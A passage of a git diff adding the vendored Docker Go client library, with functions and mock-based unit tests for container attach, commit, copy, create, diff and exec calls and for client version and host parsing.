DefaultVersion, + }, + { + envs: map[string]string{ + "DOCKER_API_VERSION": "anything", + }, + expectedVersion: "anything", + }, + { + envs: map[string]string{ + "DOCKER_API_VERSION": "1.22", + }, + expectedVersion: "1.22", + }, + } + for _, c := range cases { + recoverEnvs := setupEnvs(t, c.envs) + apiclient, err := NewEnvClient() + if c.expectedError != "" { + if err == nil { + t.Errorf("expected an error for %v", c) + } else if err.Error() != c.expectedError { + t.Errorf("expected an error %s, got %s, for %v", c.expectedError, err.Error(), c) + } + } else { + if err != nil { + t.Error(err) + } + version := apiclient.ClientVersion() + if version != c.expectedVersion { + t.Errorf("expected %s, got %s, for %v", c.expectedVersion, version, c) + } + } + + if c.envs["DOCKER_TLS_VERIFY"] != "" { + // pedantic checking that this is handled correctly + tr := apiclient.client.Transport.(*http.Transport) + if tr.TLSClientConfig == nil { + t.Errorf("no tls config found when DOCKER_TLS_VERIFY enabled") + } + + if tr.TLSClientConfig.InsecureSkipVerify { + t.Errorf("tls verification should be enabled") + } + } + + recoverEnvs(t) + } +} + +func setupEnvs(t *testing.T, envs map[string]string) func(*testing.T) { + oldEnvs := map[string]string{} + for key, value := range envs { + oldEnv := os.Getenv(key) + oldEnvs[key] = oldEnv + err := os.Setenv(key, value) + if err != nil { + t.Error(err) + } + } + return func(t *testing.T) { + for key, value := range oldEnvs { + err := os.Setenv(key, value) + if err != nil { + t.Error(err) + } + } + } +} + +func TestGetAPIPath(t *testing.T) { + cases := []struct { + v string + p string + q url.Values + e string + }{ + {"", "/containers/json", nil, "/containers/json"}, + {"", "/containers/json", url.Values{}, "/containers/json"}, + {"", "/containers/json", url.Values{"s": []string{"c"}}, "/containers/json?s=c"}, + {"1.22", "/containers/json", nil, "/v1.22/containers/json"}, + {"1.22", "/containers/json", url.Values{}, "/v1.22/containers/json"}, + {"1.22", "/containers/json", url.Values{"s": []string{"c"}}, "/v1.22/containers/json?s=c"}, + {"v1.22", "/containers/json", nil, "/v1.22/containers/json"}, + {"v1.22", "/containers/json", url.Values{}, "/v1.22/containers/json"}, + {"v1.22", "/containers/json", url.Values{"s": []string{"c"}}, "/v1.22/containers/json?s=c"}, + {"v1.22", "/networks/kiwl$%^", nil, "/v1.22/networks/kiwl$%25%5E"}, + } + + for _, cs := range cases { + c, err := NewClient("unix:///var/run/docker.sock", cs.v, nil, nil) + if err != nil { + t.Fatal(err) + } + g := c.getAPIPath(cs.p, cs.q) + if g != cs.e { + t.Fatalf("Expected %s, got %s", cs.e, g) + } + + err = c.Close() + if nil != err { + t.Fatalf("close client failed, error message: %s", err) + } + } +} + +func TestParseHost(t *testing.T) { + cases := []struct { + host string + proto string + addr string + base string + err bool + }{ + {"", "", "", "", true}, + {"foobar", "", "", "", true}, + {"foo://bar", "foo", "bar", "", false}, + {"tcp://localhost:2476", "tcp", "localhost:2476", "", false}, + {"tcp://localhost:2476/path", "tcp", "localhost:2476", "/path", false}, + } + + for _, cs := range cases { + p, a, b, e := ParseHost(cs.host) + if cs.err && e == nil { + t.Fatalf("expected error, got nil") + } + if !cs.err && e != nil { + t.Fatal(e) + } + if cs.proto != p { + t.Fatalf("expected proto %s, got %s", cs.proto, p) + } + if cs.addr != a { + t.Fatalf("expected addr %s, got %s", cs.addr, a) + } + if cs.base != b { + t.Fatalf("expected base %s, got %s", cs.base, b) + } + } +} + +func TestUpdateClientVersion(t *testing.T) { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + splitQuery := strings.Split(req.URL.Path, "/") + queryVersion := splitQuery[1] + b, err := json.Marshal(types.Version{ + APIVersion: queryVersion, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + }), + } + + cases := []struct { + v string + }{ + {"1.20"}, + {"v1.21"}, + {"1.22"}, + {"v1.22"}, + } + + for _, cs := range cases { + client.UpdateClientVersion(cs.v) + r, err := client.ServerVersion(context.Background()) + if err != nil { + t.Fatal(err) + } + if strings.TrimPrefix(r.APIVersion, "v") != strings.TrimPrefix(cs.v, "v") { + t.Fatalf("Expected %s, got %s", cs.v, r.APIVersion) + } + } +} + +func TestNewEnvClientSetsDefaultVersion(t *testing.T) { + // Unset environment variables + envVarKeys := []string{ + "DOCKER_HOST", + "DOCKER_API_VERSION", + "DOCKER_TLS_VERIFY", + "DOCKER_CERT_PATH", + } + envVarValues := make(map[string]string) + for _, key := range envVarKeys { + envVarValues[key] = os.Getenv(key) + os.Setenv(key, "") + } + + client, err := NewEnvClient() + if err != nil { + t.Fatal(err) + } + if client.version != DefaultVersion { + t.Fatalf("Expected %s, got %s", DefaultVersion, client.version) + } + + expected := "1.22" + os.Setenv("DOCKER_API_VERSION", expected) + client, err = NewEnvClient() + if err != nil { + t.Fatal(err) + } + if client.version != expected { + t.Fatalf("Expected %s, got %s", expected, client.version) + } + + // Restore environment variables + for _, key := range envVarKeys { + os.Setenv(key, envVarValues[key]) + } +} diff --git a/vendor/github.com/docker/docker/client/client_unix.go b/vendor/github.com/docker/docker/client/client_unix.go new file mode 100644 index 0000000000..89de892c85 --- /dev/null +++ b/vendor/github.com/docker/docker/client/client_unix.go @@ -0,0 +1,6 @@ +// +build linux freebsd solaris openbsd darwin + +package client + +// DefaultDockerHost defines os specific default if DOCKER_HOST is unset +const DefaultDockerHost = "unix:///var/run/docker.sock" diff --git a/vendor/github.com/docker/docker/client/client_windows.go b/vendor/github.com/docker/docker/client/client_windows.go new file mode 100644 index 0000000000..07c0c7a774 --- /dev/null +++ b/vendor/github.com/docker/docker/client/client_windows.go @@ -0,0 +1,4 @@ +package client + +// DefaultDockerHost defines os specific default if DOCKER_HOST is unset +const DefaultDockerHost = "npipe:////./pipe/docker_engine" diff --git a/vendor/github.com/docker/docker/client/container_attach.go b/vendor/github.com/docker/docker/client/container_attach.go new file mode 100644 index 0000000000..eea4682158 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_attach.go @@ -0,0 +1,37 @@ +package client + +import ( + "net/url" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// ContainerAttach attaches a connection to a container in the server. +// It returns a types.HijackedConnection with the hijacked connection +// and the a reader to get output. It's up to the called to close +// the hijacked connection by calling types.HijackedResponse.Close. +func (cli *Client) ContainerAttach(ctx context.Context, container string, options types.ContainerAttachOptions) (types.HijackedResponse, error) { + query := url.Values{} + if options.Stream { + query.Set("stream", "1") + } + if options.Stdin { + query.Set("stdin", "1") + } + if options.Stdout { + query.Set("stdout", "1") + } + if options.Stderr { + query.Set("stderr", "1") + } + if options.DetachKeys != "" { + query.Set("detachKeys", options.DetachKeys) + } + if options.Logs { + query.Set("logs", "1") + } + + headers := map[string][]string{"Content-Type": {"text/plain"}} + return cli.postHijacked(ctx, "/containers/"+container+"/attach", query, nil, headers) +} diff --git a/vendor/github.com/docker/docker/client/container_commit.go b/vendor/github.com/docker/docker/client/container_commit.go new file mode 100644 index 0000000000..c766d62e40 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_commit.go @@ -0,0 +1,53 @@ +package client + +import ( + "encoding/json" + "errors" + "net/url" + + distreference "github.com/docker/distribution/reference" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/reference" + "golang.org/x/net/context" +) + +// ContainerCommit applies changes into a container and creates a new tagged image. +func (cli *Client) ContainerCommit(ctx context.Context, container string, options types.ContainerCommitOptions) (types.IDResponse, error) { + var repository, tag string + if options.Reference != "" { + distributionRef, err := distreference.ParseNamed(options.Reference) + if err != nil { + return types.IDResponse{}, err + } + + if _, isCanonical := distributionRef.(distreference.Canonical); isCanonical { + return types.IDResponse{}, errors.New("refusing to create a tag with a digest reference") + } + + tag = reference.GetTagFromNamedRef(distributionRef) + repository = distributionRef.Name() + } + + query := url.Values{} + query.Set("container", container) + query.Set("repo", repository) + query.Set("tag", tag) + query.Set("comment", options.Comment) + query.Set("author", options.Author) + for _, change := range options.Changes { + query.Add("changes", change) + } + if options.Pause != true { + query.Set("pause", "0") + } + + var response types.IDResponse + resp, err := cli.post(ctx, "/commit", query, options.Config, nil) + if err != nil { + return response, err + } + + err = json.NewDecoder(resp.body).Decode(&response) + ensureReaderClosed(resp) + return response, err +} diff --git a/vendor/github.com/docker/docker/client/container_commit_test.go b/vendor/github.com/docker/docker/client/container_commit_test.go new file mode 100644 index 0000000000..a844675368 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_commit_test.go @@ -0,0 +1,96 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestContainerCommitError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ContainerCommit(context.Background(), "nothing", types.ContainerCommitOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestContainerCommit(t *testing.T) { + expectedURL := "/commit" + expectedContainerID := "container_id" + specifiedReference := "repository_name:tag" + expectedRepositoryName := "repository_name" + expectedTag := "tag" + expectedComment := "comment" + expectedAuthor := "author" + expectedChanges := []string{"change1", "change2"} + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + query := req.URL.Query() + containerID := query.Get("container") + if containerID != expectedContainerID { + return nil, fmt.Errorf("container id not set in URL query properly. Expected '%s', got %s", expectedContainerID, containerID) + } + repo := query.Get("repo") + if repo != expectedRepositoryName { + return nil, fmt.Errorf("container repo not set in URL query properly. Expected '%s', got %s", expectedRepositoryName, repo) + } + tag := query.Get("tag") + if tag != expectedTag { + return nil, fmt.Errorf("container tag not set in URL query properly. Expected '%s', got %s'", expectedTag, tag) + } + comment := query.Get("comment") + if comment != expectedComment { + return nil, fmt.Errorf("container comment not set in URL query properly. Expected '%s', got %s'", expectedComment, comment) + } + author := query.Get("author") + if author != expectedAuthor { + return nil, fmt.Errorf("container author not set in URL query properly. Expected '%s', got %s'", expectedAuthor, author) + } + pause := query.Get("pause") + if pause != "0" { + return nil, fmt.Errorf("container pause not set in URL query properly. Expected 'true', got %v'", pause) + } + changes := query["changes"] + if len(changes) != len(expectedChanges) { + return nil, fmt.Errorf("expected container changes size to be '%d', got %d", len(expectedChanges), len(changes)) + } + b, err := json.Marshal(types.IDResponse{ + ID: "new_container_id", + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + }), + } + + r, err := client.ContainerCommit(context.Background(), expectedContainerID, types.ContainerCommitOptions{ + Reference: specifiedReference, + Comment: expectedComment, + Author: expectedAuthor, + Changes: expectedChanges, + Pause: false, + }) + if err != nil { + t.Fatal(err) + } + if r.ID != "new_container_id" { + t.Fatalf("expected `container_id`, got %s", r.ID) + } +} diff --git a/vendor/github.com/docker/docker/client/container_copy.go b/vendor/github.com/docker/docker/client/container_copy.go new file mode 100644 index 0000000000..8380eeabc9 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_copy.go @@ -0,0 +1,97 @@ +package client + +import ( + "encoding/base64" + "encoding/json" + "fmt" + "io" + "net/http" + "net/url" + "path/filepath" + "strings" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" +) + +// ContainerStatPath returns Stat information about a path inside the container filesystem. +func (cli *Client) ContainerStatPath(ctx context.Context, containerID, path string) (types.ContainerPathStat, error) { + query := url.Values{} + query.Set("path", filepath.ToSlash(path)) // Normalize the paths used in the API. + + urlStr := fmt.Sprintf("/containers/%s/archive", containerID) + response, err := cli.head(ctx, urlStr, query, nil) + if err != nil { + return types.ContainerPathStat{}, err + } + defer ensureReaderClosed(response) + return getContainerPathStatFromHeader(response.header) +} + +// CopyToContainer copies content into the container filesystem. +func (cli *Client) CopyToContainer(ctx context.Context, container, path string, content io.Reader, options types.CopyToContainerOptions) error { + query := url.Values{} + query.Set("path", filepath.ToSlash(path)) // Normalize the paths used in the API. + // Do not allow for an existing directory to be overwritten by a non-directory and vice versa. + if !options.AllowOverwriteDirWithFile { + query.Set("noOverwriteDirNonDir", "true") + } + + apiPath := fmt.Sprintf("/containers/%s/archive", container) + + response, err := cli.putRaw(ctx, apiPath, query, content, nil) + if err != nil { + return err + } + defer ensureReaderClosed(response) + + if response.statusCode != http.StatusOK { + return fmt.Errorf("unexpected status code from daemon: %d", response.statusCode) + } + + return nil +} + +// CopyFromContainer gets the content from the container and returns it as a Reader +// to manipulate it in the host. It's up to the caller to close the reader. +func (cli *Client) CopyFromContainer(ctx context.Context, container, srcPath string) (io.ReadCloser, types.ContainerPathStat, error) { + query := make(url.Values, 1) + query.Set("path", filepath.ToSlash(srcPath)) // Normalize the paths used in the API. + + apiPath := fmt.Sprintf("/containers/%s/archive", container) + response, err := cli.get(ctx, apiPath, query, nil) + if err != nil { + return nil, types.ContainerPathStat{}, err + } + + if response.statusCode != http.StatusOK { + return nil, types.ContainerPathStat{}, fmt.Errorf("unexpected status code from daemon: %d", response.statusCode) + } + + // In order to get the copy behavior right, we need to know information + // about both the source and the destination. The response headers include + // stat info about the source that we can use in deciding exactly how to + // copy it locally. Along with the stat info about the local destination, + // we have everything we need to handle the multiple possibilities there + // can be when copying a file/dir from one location to another file/dir. + stat, err := getContainerPathStatFromHeader(response.header) + if err != nil { + return nil, stat, fmt.Errorf("unable to get resource stat from response: %s", err) + } + return response.body, stat, err +} + +func getContainerPathStatFromHeader(header http.Header) (types.ContainerPathStat, error) { + var stat types.ContainerPathStat + + encodedStat := header.Get("X-Docker-Container-Path-Stat") + statDecoder := base64.NewDecoder(base64.StdEncoding, strings.NewReader(encodedStat)) + + err := json.NewDecoder(statDecoder).Decode(&stat) + if err != nil { + err = fmt.Errorf("unable to decode container path stat header: %s", err) + } + + return stat, err +} diff --git a/vendor/github.com/docker/docker/client/container_copy_test.go b/vendor/github.com/docker/docker/client/container_copy_test.go new file mode 100644 index 0000000000..706a20c818 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_copy_test.go @@ -0,0 +1,244 @@ +package client + +import ( + "bytes" + "encoding/base64" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" +) + +func TestContainerStatPathError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ContainerStatPath(context.Background(), "container_id", "path") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server error, got %v", err) + } +} + +func TestContainerStatPathNoHeaderError(t *testing.T) { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + _, err := client.ContainerStatPath(context.Background(), "container_id", "path/to/file") + if err == nil { + t.Fatalf("expected an error, got nothing") + } +} + +func TestContainerStatPath(t *testing.T) { + expectedURL := "/containers/container_id/archive" + expectedPath := "path/to/file" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "HEAD" { + return nil, fmt.Errorf("expected HEAD method, got %s", req.Method) + } + query := req.URL.Query() + path := query.Get("path") + if path != expectedPath { + return nil, fmt.Errorf("path not set in URL query properly") + } + content, err := json.Marshal(types.ContainerPathStat{ + Name: "name", + Mode: 0700, + }) + if err != nil { + return nil, err + } + base64PathStat := base64.StdEncoding.EncodeToString(content) + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + Header: http.Header{ + "X-Docker-Container-Path-Stat": []string{base64PathStat}, + }, + }, nil + }), + } + stat, err := client.ContainerStatPath(context.Background(), "container_id", expectedPath) + if err != nil { + t.Fatal(err) + } + if stat.Name != "name" { + t.Fatalf("expected container path stat name to be 'name', got '%s'", stat.Name) + } + if stat.Mode != 0700 { + t.Fatalf("expected container path stat mode to be 0700, got '%v'", stat.Mode) + } +} + +func TestCopyToContainerError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + err := client.CopyToContainer(context.Background(), "container_id", "path/to/file", bytes.NewReader([]byte("")), types.CopyToContainerOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server error, got %v", err) + } +} + +func TestCopyToContainerNotStatusOKError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusNoContent, "No content")), + } + err := client.CopyToContainer(context.Background(), "container_id", "path/to/file", bytes.NewReader([]byte("")), types.CopyToContainerOptions{}) + if err == nil || err.Error() != "unexpected status code from daemon: 204" { + t.Fatalf("expected an unexpected status code error, got %v", err) + } +} + +func TestCopyToContainer(t *testing.T) { + expectedURL := "/containers/container_id/archive" + expectedPath := "path/to/file" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "PUT" { + return nil, fmt.Errorf("expected PUT method, got %s", req.Method) + } + query := req.URL.Query() + path := query.Get("path") + if path != expectedPath { + return nil, fmt.Errorf("path not set in URL query properly, expected '%s', got %s", expectedPath, path) + } + noOverwriteDirNonDir := query.Get("noOverwriteDirNonDir") + if noOverwriteDirNonDir != "true" { + return nil, fmt.Errorf("noOverwriteDirNonDir not set in URL query properly, expected true, got %s", noOverwriteDirNonDir) + } + + content, err := ioutil.ReadAll(req.Body) + if err != nil { + return nil, err + } + if err := req.Body.Close(); err != nil { + return nil, err + } + if string(content) != "content" { + return nil, fmt.Errorf("expected content to be 'content', got %s", string(content)) + } + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + err := client.CopyToContainer(context.Background(), "container_id", expectedPath, bytes.NewReader([]byte("content")), types.CopyToContainerOptions{ + AllowOverwriteDirWithFile: false, + }) + if err != nil { + t.Fatal(err) + } +} + +func TestCopyFromContainerError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, _, err := client.CopyFromContainer(context.Background(), "container_id", "path/to/file") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server error, got %v", err) + } +} + +func TestCopyFromContainerNotStatusOKError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusNoContent, "No content")), + } + _, _, err := client.CopyFromContainer(context.Background(), "container_id", "path/to/file") + if err == nil || err.Error() != "unexpected status code from daemon: 204" { + t.Fatalf("expected an unexpected status code error, got %v", err) + } +} + +func TestCopyFromContainerNoHeaderError(t *testing.T) { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + _, _, err := client.CopyFromContainer(context.Background(), "container_id", "path/to/file") + if err == nil { + t.Fatalf("expected an error, got nothing") + } +} + +func TestCopyFromContainer(t *testing.T) { + expectedURL := "/containers/container_id/archive" + expectedPath := "path/to/file" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "GET" { + return nil, fmt.Errorf("expected PUT method, got %s", req.Method) + } + query := req.URL.Query() + path := query.Get("path") + if path != expectedPath { + return nil, fmt.Errorf("path not set in URL query properly, expected '%s', got %s", expectedPath, path) + } + + headercontent, err := json.Marshal(types.ContainerPathStat{ + Name: "name", + Mode: 0700, + }) + if err != nil { + return nil, err + } + base64PathStat := base64.StdEncoding.EncodeToString(headercontent) + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("content"))), + Header: http.Header{ + "X-Docker-Container-Path-Stat": []string{base64PathStat}, + }, + }, nil + }), + } + r, stat, err := client.CopyFromContainer(context.Background(), "container_id", expectedPath) + if err != nil { + t.Fatal(err) + } + if stat.Name != "name" { + t.Fatalf("expected container path stat name to be 'name', got '%s'", stat.Name) + } + if stat.Mode != 0700 { + t.Fatalf("expected container path stat mode to be 0700, got '%v'", stat.Mode) + } + content, err := ioutil.ReadAll(r) + if err != nil { + t.Fatal(err) + } + if err := r.Close(); err != nil { + t.Fatal(err) + } + if string(content) != "content" { + t.Fatalf("expected content to be 'content', got %s", string(content)) + } +} diff --git a/vendor/github.com/docker/docker/client/container_create.go b/vendor/github.com/docker/docker/client/container_create.go new file mode 100644 index 0000000000..9f627aafa6 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_create.go @@ -0,0 +1,50 @@ +package client + +import ( + "encoding/json" + "net/url" + "strings" + + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/network" + "golang.org/x/net/context" +) + +type configWrapper struct { + *container.Config + HostConfig *container.HostConfig + NetworkingConfig *network.NetworkingConfig +} + +// ContainerCreate creates a new container based in the given configuration. +// It can be associated with a name, but it's not mandatory. +func (cli *Client) ContainerCreate(ctx context.Context, config *container.Config, hostConfig *container.HostConfig, networkingConfig *network.NetworkingConfig, containerName string) (container.ContainerCreateCreatedBody, error) { + var response container.ContainerCreateCreatedBody + + if err := cli.NewVersionError("1.25", "stop timeout"); config != nil && config.StopTimeout != nil && err != nil { + return response, err + } + + query := url.Values{} + if containerName != "" { + query.Set("name", containerName) + } + + body := configWrapper{ + Config: config, + HostConfig: hostConfig, + NetworkingConfig: networkingConfig, + } + + serverResp, err := cli.post(ctx, "/containers/create", query, body, nil) + if err != nil { + if serverResp.statusCode == 404 && strings.Contains(err.Error(), "No such image") { + return response, imageNotFoundError{config.Image} + } + return response, err + } + + err = json.NewDecoder(serverResp.body).Decode(&response) + ensureReaderClosed(serverResp) + return response, err +} diff --git a/vendor/github.com/docker/docker/client/container_create_test.go b/vendor/github.com/docker/docker/client/container_create_test.go new file mode 100644 index 0000000000..15dbd5ea01 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_create_test.go @@ -0,0 +1,76 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types/container" + "golang.org/x/net/context" +) + +func TestContainerCreateError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ContainerCreate(context.Background(), nil, nil, nil, "nothing") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error while testing StatusInternalServerError, got %v", err) + } + + // 404 doesn't automagitally means an unknown image + client = &Client{ + client: newMockClient(errorMock(http.StatusNotFound, "Server error")), + } + _, err = client.ContainerCreate(context.Background(), nil, nil, nil, "nothing") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error while testing StatusNotFound, got %v", err) + } +} + +func TestContainerCreateImageNotFound(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusNotFound, "No such image")), + } + _, err := client.ContainerCreate(context.Background(), &container.Config{Image: "unknown_image"}, nil, nil, "unknown") + if err == nil || !IsErrImageNotFound(err) { + t.Fatalf("expected an imageNotFound error, got %v", err) + } +} + +func TestContainerCreateWithName(t *testing.T) { + expectedURL := "/containers/create" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + name := req.URL.Query().Get("name") + if name != "container_name" { + return nil, fmt.Errorf("container name not set in URL query properly. Expected `container_name`, got %s", name) + } + b, err := json.Marshal(container.ContainerCreateCreatedBody{ + ID: "container_id", + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + }), + } + + r, err := client.ContainerCreate(context.Background(), nil, nil, nil, "container_name") + if err != nil { + t.Fatal(err) + } + if r.ID != "container_id" { + t.Fatalf("expected `container_id`, got %s", r.ID) + } +} diff --git a/vendor/github.com/docker/docker/client/container_diff.go b/vendor/github.com/docker/docker/client/container_diff.go new file mode 100644 index 0000000000..1e3e554fc5 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_diff.go @@ -0,0 +1,23 @@ +package client + +import ( + "encoding/json" + "net/url" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// ContainerDiff shows differences in a container filesystem since it was started. +func (cli *Client) ContainerDiff(ctx context.Context, containerID string) ([]types.ContainerChange, error) { + var changes []types.ContainerChange + + serverResp, err := cli.get(ctx, "/containers/"+containerID+"/changes", url.Values{}, nil) + if err != nil { + return changes, err + } + + err = json.NewDecoder(serverResp.body).Decode(&changes) + ensureReaderClosed(serverResp) + return changes, err +} diff --git a/vendor/github.com/docker/docker/client/container_diff_test.go b/vendor/github.com/docker/docker/client/container_diff_test.go new file mode 100644 index 0000000000..1ce1117684 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_diff_test.go @@ -0,0 +1,61 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestContainerDiffError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ContainerDiff(context.Background(), "nothing") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } + +} + +func TestContainerDiff(t *testing.T) { + expectedURL := "/containers/container_id/changes" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + b, err := json.Marshal([]types.ContainerChange{ + { + Kind: 0, + Path: "/path/1", + }, + { + Kind: 1, + Path: "/path/2", + }, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + }), + } + + changes, err := client.ContainerDiff(context.Background(), "container_id") + if err != nil { + t.Fatal(err) + } + if len(changes) != 2 { + t.Fatalf("expected an array of 2 changes, got %v", changes) + } +} diff --git a/vendor/github.com/docker/docker/client/container_exec.go b/vendor/github.com/docker/docker/client/container_exec.go new file mode 100644 index 0000000000..0665c54fbd --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_exec.go @@ -0,0 +1,54 @@ +package client + +import ( + "encoding/json" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// ContainerExecCreate creates a new exec configuration to run an exec process. +func (cli *Client) ContainerExecCreate(ctx context.Context, container string, config types.ExecConfig) (types.IDResponse, error) { + var response types.IDResponse + + if err := cli.NewVersionError("1.25", "env"); len(config.Env) != 0 && err != nil { + return response, err + } + + resp, err := cli.post(ctx, "/containers/"+container+"/exec", nil, config, nil) + if err != nil { + return response, err + } + err = json.NewDecoder(resp.body).Decode(&response) + ensureReaderClosed(resp) + return response, err +} + +// ContainerExecStart starts an exec process already created in the docker host. +func (cli *Client) ContainerExecStart(ctx context.Context, execID string, config types.ExecStartCheck) error { + resp, err := cli.post(ctx, "/exec/"+execID+"/start", nil, config, nil) + ensureReaderClosed(resp) + return err +} + +// ContainerExecAttach attaches a connection to an exec process in the server. +// It returns a types.HijackedConnection with the hijacked connection +// and the a reader to get output. It's up to the called to close +// the hijacked connection by calling types.HijackedResponse.Close. +func (cli *Client) ContainerExecAttach(ctx context.Context, execID string, config types.ExecConfig) (types.HijackedResponse, error) { + headers := map[string][]string{"Content-Type": {"application/json"}} + return cli.postHijacked(ctx, "/exec/"+execID+"/start", nil, config, headers) +} + +// ContainerExecInspect returns information about a specific exec process on the docker host. +func (cli *Client) ContainerExecInspect(ctx context.Context, execID string) (types.ContainerExecInspect, error) { + var response types.ContainerExecInspect + resp, err := cli.get(ctx, "/exec/"+execID+"/json", nil, nil) + if err != nil { + return response, err + } + + err = json.NewDecoder(resp.body).Decode(&response) + ensureReaderClosed(resp) + return response, err +} diff --git a/vendor/github.com/docker/docker/client/container_exec_test.go b/vendor/github.com/docker/docker/client/container_exec_test.go new file mode 100644 index 0000000000..0e296a50ad --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_exec_test.go @@ -0,0 +1,157 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" +) + +func TestContainerExecCreateError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ContainerExecCreate(context.Background(), "container_id", types.ExecConfig{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestContainerExecCreate(t *testing.T) { + expectedURL := "/containers/container_id/exec" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + // FIXME validate the content is the given ExecConfig ? + if err := req.ParseForm(); err != nil { + return nil, err + } + execConfig := 